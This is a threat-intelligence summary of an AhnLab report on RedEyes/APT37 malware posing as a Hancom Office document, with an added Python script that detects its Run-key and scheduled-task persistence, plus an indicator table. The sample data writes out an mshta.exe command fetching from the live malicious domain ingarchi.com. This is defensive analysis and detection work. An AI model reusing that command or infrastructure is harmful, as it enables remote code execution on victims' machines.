Tracking Traces of Malware Disguised as Hancom Office Document File and Being Distributed (RedEyes)

2023-06-01 Ahnlab

https://asec.ahnlab.com/en/53377/


AhnLab reports RedEyes/APT37-related malware distributed as a Hancom Office-like executable named “Who and What Threatens the World (Column).exe.” On execution it creates a onedrivenew folder under AppData, copies itself there as onedrivenew.exe, opens a decoy Hancom Office document, injects into mstsc.exe, deletes the original file via cmd, and persists through a Run registry key and a scheduled task named OneDriveOp. The scheduled task runs mshta.exe every 60 minutes to reach a seemingly normal website that hosts a web shell similar to prior RedEyes/APT37 infrastructure. AhnLab lists Trojan/Win.Agent.R580958, MD5 93fc0fb9b87a00b38f18c1cc4ee02e50, and hxxp://ingarchi.com/bbs/data/culture/getcfg.php as representative indicators.
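The persistence pattern in the summary (a Run key pointing at the AppData copy, plus a scheduled task that launches mshta.exe against a remote URL on a 60-minute cycle) is easy to hunt for in a scheduled-task and Run-key inventory. The following Python is an added example written for this page, not code from AhnLab or from the report; the sample inventory records are constructed, and the exact AppData subfolder (Roaming), the Run value name "onedrivenew", and the record layout are assumptions, since the page states only that an AppData onedrivenew folder and a Run key are used.

```python
"""Added example (not from the AhnLab report): flag scheduled-task and Run-key
records that match the OneDriveOp / mshta.exe persistence pattern on the page."""
import re
from dataclasses import dataclass
from typing import List

# Indicators quoted in the AhnLab summary above
IOC_DOMAIN = "ingarchi.com"
REPORTED_TASK_NAME = "OneDriveOp"
REPORTED_INTERVAL_MIN = 60
# Assumed path fragment: the page names the folder and file, not the full path
IOC_PATH_FRAGMENT = r"\onedrivenew\onedrivenew.exe"

URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


@dataclass
class Finding:
    source: str        # "task" or "runkey"
    name: str          # task name or Run value name
    reasons: List[str]


def inspect_task(name: str, action: str, interval_min: int) -> List[str]:
    """Return the reasons a scheduled task resembles the reported OneDriveOp task."""
    reasons = []
    action_l = action.lower()
    m = URL_RE.search(action)
    if "mshta" in action_l and m:
        reasons.append("mshta.exe invoked with a remote URL")
    if m and m.group(1).lower().rstrip(".").endswith(IOC_DOMAIN):
        reasons.append(f"contacts indicator domain {IOC_DOMAIN}")
    if name.lower() == REPORTED_TASK_NAME.lower():
        reasons.append("task name matches reported task OneDriveOp")
    if interval_min == REPORTED_INTERVAL_MIN and "mshta" in action_l:
        reasons.append("60-minute repetition matches reported cadence")
    return reasons


def inspect_runkey(value_name: str, data: str) -> List[str]:
    """Return the reasons a Run value resembles the reported AppData copy."""
    reasons = []
    if IOC_PATH_FRAGMENT in data.lower():
        reasons.append("Run value points at AppData onedrivenew copy")
    return reasons


def scan(records) -> List[Finding]:
    """Apply both checks to an inventory of task/runkey records."""
    findings = []
    for r in records:
        if r["kind"] == "task":
            reasons = inspect_task(r["name"], r["action"], r["interval_min"])
        else:
            reasons = inspect_runkey(r["name"], r["data"])
        if reasons:
            findings.append(Finding(r["kind"], r["name"], reasons))
    return findings


# Constructed sample inventory (not real host data). The second and fourth
# entries are benign OneDrive look-alikes that must not be flagged.
SAMPLE_RECORDS = [
    {"kind": "task", "name": "OneDriveOp", "interval_min": 60,
     "action": 'mshta.exe "http://ingarchi.com/bbs/data/culture/getcfg.php"'},
    {"kind": "task", "name": "OneDrive Standalone Update Task", "interval_min": 1440,
     "action": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"},
    {"kind": "runkey", "name": "onedrivenew",   # assumed value name
     "data": r"C:\Users\user\AppData\Roaming\onedrivenew\onedrivenew.exe"},
    {"kind": "runkey", "name": "OneDrive",
     "data": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f.source}] {f.name}: " + "; ".join(f.reasons))
```

The name and domain checks are brittle on their own (both are trivially changed); the mshta-with-URL and 60-minute-cadence checks are the ones worth keeping as a generic rule, with the IoC matches as corroboration.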

Indicators of Compromise

Type    Value                              First Seen  Last Seen
HASH    93fc0fb9b87a00b38f18c1cc4ee02e50   2023-05-25  2023-06-01
URL     http://ingarchi.com/bbs/data/cu…   2023-05-25  2023-06-01
URL     http://ingarchi.com/bbs/data/cu…   2023-05-25  2023-06-01
DOMAIN  ingarchi.com                       2023-05-25  2023-06-01
